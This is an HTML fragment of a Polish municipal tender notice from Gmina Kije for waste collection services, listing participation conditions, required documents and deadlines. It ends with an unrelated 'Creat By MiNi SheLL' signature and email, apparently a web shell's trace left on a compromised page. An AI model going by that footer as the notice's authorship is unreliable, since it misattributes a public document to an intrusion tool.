10) Wykonawca jest zobowiązany do wydrukowania harmonogramu i  przekazania harmonogramu właścicielom nieruchomości po 1 egzemplarzu w formie papierowej dla każdego właściciela.
11) Harmonogram przygotowany na wymagany okres obowiązuje do końca roku na który został ustalony. W przypadku nieprzewidzianych okoliczności, za zgodą Zamawiającego, dopuszcza się zmianę terminu odbioru odpadów. Wykonawca odpowiedzialny jest w takim przypadku za bieżące poinformowanie Zamawiającego 
w sposób określony w umowie oraz właścicieli nieruchomości o zmianie.
12) Harmonogram co do treści i formy wymaga zatwierdzenia przez Zamawiającego. Wykonawca przekazuje Zamawiającemu projekt harmonogramu w formie pliku Word lub pdf bez zabezpieczeń i haseł. Zamawiający zaakceptuje harmonogram lub przedstawi uwagi do niego w terminie 3 dni od jego otrzymania. Wykonawca w terminie 3 dni wprowadzi uwagi Zamawiającego oraz przedstawi go do ponownej akceptacji..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt 6.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.31.00-7, 90.53.30.00-2, 90.51.12.00-4, 90.51.10.00-2, 90.51.20.00-9, 90.51.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia przez wykonawcę wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że posiada wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości prowadzonego przez Wójta Gminy Kije jako organu właściwego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że 
wykonywał lub wykonuje w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, w sposób ciągły przez okres minimum 12 miesięcy, usługi lub usługę odbierania i zagospodarowania odpadów komunalnych od minimum 1200 nieruchomości zamieszkanych w ramach której lub od których odebrał odpady 
o łącznej ilości co najmniej 200 Mg.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że: 
- dysponuje sprzętem specjalistycznym do odbioru i transportu odpadów tj. co najmniej dwoma samochodami przystosowanymi do odbierania zmieszanych odpadów komunalnych i co najmniej dwoma pojazdami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych oraz jednym pojazdem do odbierania odpadów bez funkcji kompaktującej. 
- posiada bazę magazynowo transportową usytuowaną na terenie Gminy Kije lub 
w odległości nie większej niż 60 km od granic Gminy Kije.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę co najmniej 
200 000,00zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie i w granicach art. 144 ust.1 Ustawy Pzp Zamawiający dopuszcza możliwość zmiany zawartej umowy o zamówienie w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy. Zmiana postanowień niniejszej umowy, może nastąpić w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem wskazanych warunków ich wprowadzenia:
1. Zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu Umowy,
2. Zmiana terminu wykonania przedmiotu umowy przy zaistnieniu zdarzeń o charakterze siły wyższej, niezależnych od Stron Umowy, które uniemożliwiłyby terminowe wykonanie zobowiązań. Strony zobowiązują się do ustalenia odpowiednio zmienionego terminu wykonania przedmiotu Umowy. 
3. Zmiany terminu wykonania przedmiotu umowy spowodowane działaniem organów administracji, w szczególności: odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień bądź wydania decyzji, zezwoleń, uzgodnień po ustawowym terminie,
4. wystąpienia uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeśli zmiany te są korzystne dla Zamawiającego, 
5. z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kije.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można odbierać w siedzibie zamawiającego pokój nr 12 w terminie 5 dni od złożenia wniosku..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2013 godzina 09:00, miejsce: Ofertę należy złożyć w sekretariacie Urzędu Gminy w Kijach, Kije 16, pokój 
nr 18.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com